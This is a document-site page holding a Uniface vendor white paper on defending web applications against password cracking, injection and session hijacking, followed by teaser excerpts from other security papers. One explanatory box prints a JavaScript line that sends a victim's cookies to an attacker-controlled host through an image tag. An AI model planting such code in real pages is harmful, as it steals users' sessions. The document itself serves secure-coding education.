Uniface and Web Application Security
|
|
|
- Esmond Griffith
- 9 years ago
- Views:
Transcription
1 WHITE PAP ER Uniface and Web Application Security written by James Rodger, Uniface Subject Matter Expert
2 10 Ways Uniface Helps You Succeed #1 #2 #3 #4 #5 #6 #7 #8 #9 #10 PRODUCTIVITY RELIABILITY SECURITY INTEGRATION & REUSE SCALABILITY AGILITY SUSTAINABILITY TECHNOLOGY INDEPENDENCE COMMUNITY PARTNERSUNITED PROGRAM Introduction This paper describes how Uniface helps developers produce securely coded applications. It s aimed not only at security experts, but also at IT and business managers with an interest in safeguarding information and resources. First we explain why this is a hot topic, and introduce Uniface for those who aren t already familiar with it. Then we delve into some of the features that make Uniface an ideal choice for web applications security. Why Should We Be Interested in Security, and Secure Coding in Particular? General Security Concerns Security issues are disturbing executives rest in the wake of high-profile incidents. Incidents like this can cost money in terms of regulatory penalties, reputation damage, the need to compensate or mollify users, and lost business. Part of the stress for business leaders comes from the fact that, with businesses increasingly opening up their data and systems to the outside world, it s unrealistic to expect full security at the perimeter. There is no firewall that can t be breached. Another worry is the realization that attacks can come from within for example, from disaffected employees or from malware. It therefore makes sense to complement your efforts to defend the perimeter with steps to make sure individual elements are intrinsically secure. Specific Web Application Security Concerns There are particular concerns about web applications, because by their nature they often open up information to users outside the company. Public web applications are by definition accessible to every bad person with access to the internet. You re dealing with people actively trying to break your application. Internal web applications may be only accessible to employees, but there is always the risk of disgruntled staff or contractors with their own agenda. Techniques like SQL injection and JavaScript injection or session hijacking have joined the more obvious ones like password cracking as ways for outsiders to get access to data and resources that they shouldn t. The Open Web Application Security Project (OWASP) produces a useful list of the top 10 current threats1. Even though web applications have more than their fair share of vulnerabilities, there are many good reasons to develop them, and organizations can t avoid them. Instead, they need to find ways to address the security concerns. 2
3 New to Uniface? Start Here The Uniface platform: Is an Integrated Development Environment (IDE) and deployment tool Operates on Microsoft Windows, Linux, proprietary Unix, and legacy platforms from HP and IBM Maintains critical enterprise data and supports vital business processes (e.g. webbased online shopping, financial transactions, salary administration, and inventory control), making it an ideal solution for complex systems Is used by thousands of companies and millions of end-users. Uniface applications: Are database- and platform-independent Integrate with all major database products Integrate with many other technologies at multiple tiers of the application architecture Range in architecture from mobile to web to client/ server Include everything from data entry to intranets. There are a variety of methods for securing web applications, some of which, such as firewalls and password hygiene, are common to all applications. In addition, software development processes need to encourage a security culture so everyone from design to testing to deployment is conscious of security issues. Nonetheless, secure coding of web applications is vital. It complements your other security measures and gives you a second line of defense when those measures are breached. The Importance of Secure Coding Security needs to be designed in it can t be plugged in afterwards, for example at the time of deployment, as some organizations try to do. Some development environments make it easier than others to design and code secure web applications. Having a solution that gives you the features you need to write secure web applications including both front and back ends and provides a complete set of secure features out of the box can greatly help this effort. That completeness means you secure everything from database drivers to the JavaScript front end in an integrated way. This comprehensive approach to secure coding contrasts with perhaps other development environments where users need to select languages, application frameworks, JavaScript front ends and so on, individually. There s a lot of risk involved in this process, as well as a potential learning curve and the possibility that one part of your solution won t play nicely with the rest. Uniface in Short Apart from its ability to support secure coding, which we ll discuss next, Uniface has strong security credentials: We make our product as secure as possible to benefit the entire customer base. Security audits take place on customer applications all over the world, all the time. We work with customers to deal with their concerns and make sure the right preventative measures are in our product (that is why we use HTTP-only cookies in the default Uniface install, for example). We work with Vericode who carry out regular security tests on Uniface Web. 3
4 Technical Info Web application challenges in more depth Applications Are Stateless Web applications are built over HTTP, which is a stateless protocol. This means that each request has no knowledge of the requests that went before it and therefore the state of the application. The application is responsible for tracking the state of each user. This is done by passing session information to the client, which can be vulnerable to tampering and misuse. No Control Over the Client Users access your application using a browser of their choice. This is challenging enough when it comes to ensuring everything works well in all the possible clients your users connect with. However, when we consider that malicious users can use clients specifically designed to find and exploit holes in our application things get even more challenging. No Control Over the Network As well as the client, we need to look at the infrastructure connecting the client with our application on the server. For example, an innocent user could be compromised by a third party looking at traffic flowing over the network. We take a proactive stance on security issues. We re always on the lookout for the next threats. When we spot a new one, we deal with it within our product and also work with our users to make sure they know what, if anything, they need to do. For example, Uniface uses the OpenSSL cryptographic software library and so we can respond to current threats by quickly reissuing the latest patches for our current versions. We also make our customers aware that other technologies they might be using to deploy Uniface applications could also be affected. How Uniface Helps Developers Secure Web Applications Web Application Security Challenges The special challenges of web development come into three categories, and are explained in more detail in the box below: 1. Applications are stateless so the application needs to keep track of the state of each user 2. We typically have no control over the client 3. Often we have no control over the network, which also forms part of the application. In addition, the greater complexity of a web application means there are many opportunities for attack see diagram below. 1 DOM Uniface Web Client HTTP 7 8 Browser Network Web Container WRD Servlet Web Server (Tomcat) 2 Uniface Router urouter 3 6 Uniface Server 4 USYHTTP userver Diagram: Example Web Application Request 5 DSP Uniface DBMS Connector Database DBMS Component or Protocol Process Legend 4
5 Technical Info Salt is added because, even with a perfect hashing algorithm, there is nothing stopping an attacker simply running the hashing algorithm over and over for every possible input and recording what the hashes are (provided they have enough time and storage space). They can then look up the hashed passwords in the pre-computed tables, (referred to as rainbow tables). The aim of a salt is to make the input to the hash function so long that this approach isn t feasible, because of the large number of values that would need to be pre-computed. Areas that need to be considered when coding web applications include: Authentication: Checking identity ensuring people are who they say they are Authorization: Who has access to what Browser security: How browsers behave and being aware of threats targeting the user s client Session management: The application needs to track a user s session across multiple requests. The mechanisms used to do this need to be secure against attack Data I/O: Any data coming from the client is suspect. Everything in a request needs to be checked and sanitized before you do anything with it. Data being passed back out to the client can potentially be read by anyone with access to the client or the network in between Configuration and deployment: Covers issues specific to web applications like ensuring that your web server is configured in a secure way (to give a very simple example) Combating Common Threats with Uniface We ll now focus on three specific types of threat and illustrate how Uniface can help developers guard against them. The three types are: Password cracking Interpreter injection (including SQL and JavaScript injection and parameter manipulation) Session hijacking, including session fixation, session sidejacking and physical access. Password Cracking This relates most to authentication, and to configuration and deployment. It is, of course, a problem with all applications, not just web ones. It includes brute forcing from the login page, or brute-forcing the database using common passwords or pre-computed hash tables ( rainbow tables ) in order to get at stored passwords giving access to your resources. Good password hygiene (e.g. policies that demand complex passwords) is an important part of the solution. A Uniface developer can also log failed attempts and after a number of these events force the user to solve a CAPTCHA ( Completely Automated Public Turing test to tell Computers and Humans Apart ). This prevents attacks using scripts to try large numbers of passwords because CAPTCHAs can only be read by humans. Interfacing with common CAPTCHA libraries is trivial with Uniface s JavaScript API. 5
6 In the case of attacks on password databases, storing the passwords in hashed form is a way to protect your site once a breach has occurred. (It also protects other sites if users have reused their passwords.) Hashing should make it impossible to get back from the digest or hashed form to the original password. Many hashing methods achieve this by adding salt a random string to the password. Uniface offers a number of additional features that help with authentication and password security, including: sleep pause execution to make brute-forcing a login page harder $webinfo( WEBSERVERCONTEXT ) getting request information like the remote IP $encode hashing algorithms for storing passwords using standard industry technology (always better than designing your own). Interpreter injection This family of threats relates particularly to data I/O. They can involve the attackers forcing an application to interpret and execute their own code (code injection)2 or changing code that is already being executed on a server (command injection), among other tactics. Uniface offers a variety of techniques for combating these attacks, both by making them hard or impossible to do and by allowing checks to be continuously performed so that such attacks can be detected and appropriate action taken. With SQL injection, the attacker can run any SQL command that the database supports and that the privileges of the application allow. They could drop the entire database, run commands to get additional information about the operating system or data perhaps, allowing other attack vectors to be considered. They could also add their own data to a table via an insert instruction entered into a data field: For example, adding a user record with administrator privileges would then allow the attacker to access the entire application a highly effective form of attack. This can be an issue if developers are using SQL in conjunction with a Uniface application. Uniface counters SQL injection in the following way: If you re using the Uniface database drivers, as we normally recommend, the database driver layer prevents SQL being injected. The only vulnerable command is the SQL proc statement, which you can audit for with a simple search of your source code repository. 6
7 With JavaScript injection, the attacker gets a victim s browser to run their JavaScript instructions, for example by having their script displayed within the browser using a forum post (forums often allow the use of HMTL commands so that users can format their text, which is what enables JavaScript injection when this has been implemented poorly). This means the script runs with the application s privileges which is the dangerous part. The attacker could, for example, send a user s cookies to their server and then use that to log in as them. Alternatively, they could create a fake login page and overlay it above the actual website; the user may then type their username and password which the attacker can read and use to log in. Other options are to key-log everything the user types, or trick the user into downloading a browser extension which then reports back on every other site the user visits. Because JavaScript is the programming language of browsers, a JavaScript injection vector facilitates a wide range of attacks. Uniface has several features to counter or deal with JavaScript Injection. Anything displayed in a Uniface widget will be handled correctly. The only widget to be concerned about is the raw HTML one, which allows you to put whatever you want out to the browser. Reporting functionality available within the development environment allows you to simply locate where fields of any particular type, including raw HTML, are being used. DSPs are generally not vulnerable because data is added dynamically with JavaScript. Parameter manipulation relies on the fact that you can t control what data users send to an application this fact can be used to bypass JavaScript validation or submit requests to any public operation or trigger within the application therefore this data shouldn t be trusted. Once again Uniface has ways to handle parameter manipulation. The Uniface model provides a single place to define field validation. This is then applied client-side and server-side for you automatically. Uniface automatically enforces read-only fields and will throw security exceptions if the contained data has been tampered with. Session Hijacking This family of threats relate most to authentication and to configuration and deployment. They all revolve around knowing a user s session ID so that the attacker can impersonate them. Combating them mainly comes down to good application design and having a good session management strategy. However, Uniface gives you the tools to do it easily. Session fixation involves forcing a victim to use a known session ID: for example, sending an with a link that contains a particular session ID. The attacker then just has to wait until the user logs in before taking over the now-authenticated session ID. With Uniface, session fixation can largely be solved by changing the session ID when a user successfully logs in. Uniface has inbuilt functionality to allow you to control sessions and session data. 7
8 Technical Info An example of JavaScript injection could be an attacker using JavaScript to write an image tag into the document. Whenever a user s browser comes across an image tag, it will go to the address specified and try to load an image. An attacker can subvert this by creating an image tag that points at their own server and add all sorts of information to the query string. For example: document.write( <img src=\ log_session.php?s= + escape(document.cookie) + \ /> ); This creates an image tag in the page which the user s browser will try to download an image from. The attacker has written the user s cookies into the query string, and this can then be read at attacker.com by the PHP script log_session.php In the case of session sidejacking, the attacker can compromise the session ID while a user is already logged in, for example by using a man in the middle attack to read network traffic going between the browser and server. Firesheep is a Firefox extension that, when used on an open wi-fi network, lets an attacker sniff Facebook sessions and log in as the person concerned. The attacker could also use JavaScript injection or cross-site scripting to grab a logged in user s session ID. Many of these problems can be avoided with the use of HTTPS. Session sidejacking can be mitigated in Uniface by using information supplied to the developer by Uniface, things like remote IP address; this lets you check that the session ID is being used by the person you sent it to. The default configuration of Tomcat (the web server environment for running Java code) also uses secure cookies so in practice this type of attack shouldn t happen if Uniface is used out of the box. Other threats Not all attacks can be prevented by application design or coding but there are often ways that developers can help to counter them. For example, Distributed Denial of Service attacks can be made much harder if the application prevents long processes from being run by users who are not logged in. Eavesdropping and other man in the middle attacks involve intercepting traffic between the victim and the application server. Developers should be aware of this and make sure HTTPS is used whenever sensitive data is being transmitted. Developers need to try and consider as many types of threat as possible and think how they would prevent, manage or recover from them. Uniface and the Uniface security guidelines can help. Conclusion Important though it is, secure coding is just one tool in the security armory and must be used in conjunction with deployment-related measures such as firewalls, password hygiene, management of user privileges, careful configuration of web servers and so on. Developers of web applications need to be aware of issues like those discussed above so that they can design and code safeguards into their applications from the outset, and revisit them throughout the lifecycle, right through to deployment and support. However, Uniface can do a lot to help them at the design and development stages, and can to some extent protect an application by default. Using a tool like Uniface that supports industry-standards and OpenSSL and LDAP which we use ourselves is usually far more reliable than writing your own solutions. 8
9 Enterprise Mobile Apps Are The Requirement. Do You Know The Solution? About Uniface Uniface, the most productive, reliable development tool in the industry, provides a model-driven environment for the rapid development of scalable enterprise mission-critical applications. Learn more at Uniface B.V. Hoogoorddreef 60, 1101 BE Amsterdam, The Netherlands 2016 Uniface B.V. 9 Europe: +31 (0) US: (248) Global Offices: [email protected]
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
elearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
Web application security Executive brief Managing a growing threat: an executive s guide to Web application security.
Web application security Executive brief Managing a growing threat: an executive s guide to Web application security. Danny Allan, strategic research analyst, IBM Software Group Contents 2 Introduction
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Protecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
Ruby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
Lecture 15 - Web Security
CSE497b Introduction to Computer and Network Security - Spring 2007 - Professor Jaeger Lecture 15 - Web Security CSE497b - Spring 2007 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse497b-s07/
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Christchurch Polytechnic Institute of Technology Information Systems Acquisition, Development and Maintenance Security Standard
Christchurch Polytechnic Institute of Technology Information Systems Acquisition, Development and Maintenance Security Standard Corporate Policies & Procedures Section 1: General Administration Document
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Web Application Security
Chapter 1 Web Application Security In this chapter: OWASP Top 10..........................................................2 General Principles to Live By.............................................. 4
The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
ETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
OWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
External Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Passing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Web Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
Web Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
From the Intranet to Mobile. By Divya Mehra and Stian Thorgersen
ENTERPRISE SECURITY WITH KEYCLOAK From the Intranet to Mobile By Divya Mehra and Stian Thorgersen PROJECT TIMELINE AGENDA THE OLD WAY Securing monolithic web app relatively easy Username and password
Information Security Services
Information Security Services Information Security In 2013, Symantec reported a 62% increase in data breaches over 2012. These data breaches had tremendous impacts on many companies, resulting in intellectual
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
Common Criteria Web Application Security Scoring CCWAPSS
Criteria Web Application Security Scoring CCWAPSS Author Frédéric Charpentier, security pentester. France. [email protected] Releases Version 1.0 : First public release September 2007 Version
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
Gateway Apps - Security Summary SECURITY SUMMARY
Gateway Apps - Security Summary SECURITY SUMMARY 27/02/2015 Document Status Title Harmony Security summary Author(s) Yabing Li Version V1.0 Status draft Change Record Date Author Version Change reference
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
NEXPOSE ENTERPRISE METASPLOIT PRO. Effective Vulnerability Management and validation. March 2015
NEXPOSE ENTERPRISE METASPLOIT PRO Effective Vulnerability Management and validation March 2015 KEY SECURITY CHALLENGES Common Challenges Organizations Experience Key Security Challenges Visibility gaps
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
Enterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006
Enterprise Cybersecurity Best Practices Part Number MAN-00363 Revision 006 April 2013 Hologic and the Hologic Logo are trademarks or registered trademarks of Hologic, Inc. Microsoft, Active Directory,
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
QuickBooks Online: Security & Infrastructure
QuickBooks Online: Security & Infrastructure May 2014 Contents Introduction: QuickBooks Online Security and Infrastructure... 3 Security of Your Data... 3 Access Control... 3 Privacy... 4 Availability...
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current
Web Application Security
Web Application Security Ng Wee Kai Senior Security Consultant PulseSecure Pte Ltd About PulseSecure IT Security Consulting Company Part of Consortium in IDA (T) 606 Term Tender Cover most of the IT Security
Recommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
JVA-122. Secure Java Web Development
JVA-122. Secure Java Web Development Version 7.0 This comprehensive course shows experienced developers of Java EE applications how to secure those applications and to apply best practices with regard
Why The Security You Bought Yesterday, Won t Save You Today
9th Annual Courts and Local Government Technology Conference Why The Security You Bought Yesterday, Won t Save You Today Ian Robertson Director of Information Security Michael Gough Sr. Risk Analyst About
How Web Application Security Can Prevent Malicious Attacks
Securing Enterprise Web Applications for Critical Data Protection and PCI-DSS Compliance Selecting the Right Technology is Essential in Guarding Against Malicious Attacks White_Paper As today s organizations
Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
CS 356 Lecture 25 and 26 Operating System Security. Spring 2013
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control
MIGRATIONWIZ SECURITY OVERVIEW
MIGRATIONWIZ SECURITY OVERVIEW Table of Contents Introduction... 2 Shared Security Approach... 2 Customer Best Practices... 2 Application Security... 4 Database Level Security... 4 Network Security...
Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
Web Application Security Considerations
Web Application Security Considerations Eric Peele, Kevin Gainey International Field Directors & Technology Conference 2006 May 21 24, 2006 RTI International is a trade name of Research Triangle Institute
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities Protecting a business s IT infrastructure is complex. Take, for example, a retailer operating a standard multi-tier infrastructure
OWASP AND APPLICATION SECURITY
SECURING THE 3DEXPERIENCE PLATFORM OWASP AND APPLICATION SECURITY Milan Bruchter/Shutterstock.com WHITE PAPER EXECUTIVE SUMMARY As part of Dassault Systèmes efforts to counter threats of hacking, particularly
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Building Web Apps with Uniface
Building Web Apps with Uniface written by Michael Taylor, Uniface Mobile Product Manager 10 Ways Uniface Helps You Succeed Introduction When you re choosing a development tool for new applications and
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
How To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
Cross-site site Scripting Attacks on Android WebView
IJCSN International Journal of Computer Science and Network, Vol 2, Issue 2, April 2013 1 Cross-site site Scripting Attacks on Android WebView 1 Bhavani A B 1 Hyderabad, Andhra Pradesh-500050, India Abstract
BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note
BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise
Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
Business white paper. Missioncritical. defense. Creating a coordinated response to application security attacks
Business white paper Missioncritical defense Creating a coordinated response to application security attacks Table of contents 3 Your business is under persistent attack 4 Respond to those attacks seamlessly
SAP: Session (Fixation) Attacks and Protections
www.taddong.com SAP: Session (Fixation) Attacks and Protections (in Web Applications) Raul Siles [email protected] April 15, 2011 VII OWASP Spain Chapter Meeting Copyright 2011 Taddong S.L. Todos los derechos
Guidelines for Web applications protection with dedicated Web Application Firewall
Guidelines for Web applications protection with dedicated Web Application Firewall Prepared by: dr inŝ. Mariusz Stawowski, CISSP Bartosz Kryński, Imperva Certified Security Engineer INTRODUCTION Security
A Decision Maker s Guide to Securing an IT Infrastructure
A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
White Paper. What is an Identity Provider, and Why Should My Organization Become One?
White Paper What is an Identity Provider, and Why Should My Organization Become One? May 2015 Executive Overview Tame Access Control Security Risks: Become an Identity Provider (IdP) Organizations today
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Locking down a Hitachi ID Suite server
Locking down a Hitachi ID Suite server 2016 Hitachi ID Systems, Inc. All rights reserved. Organizations deploying Hitachi ID Identity and Access Management Suite need to understand how to secure its runtime
Making Database Security an IT Security Priority
Sponsored by Oracle Making Database Security an IT Security Priority A SANS Whitepaper November 2009 Written by Tanya Baccam Security Strategy Overview Why a Database Security Strategy? Making Databases
Defense-in-Depth Strategies for Secure, Open Remote Access to Control System Networks
Defense-in-Depth Strategies for Secure, Open Remote Access to Control System Networks A look at multi-vendor access strategies Joel Langill TÜV FSEng ID-1772/09, CEH, CPT, CCNA Security Consultant / Staff
Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
Table of Contents. Page 2/13
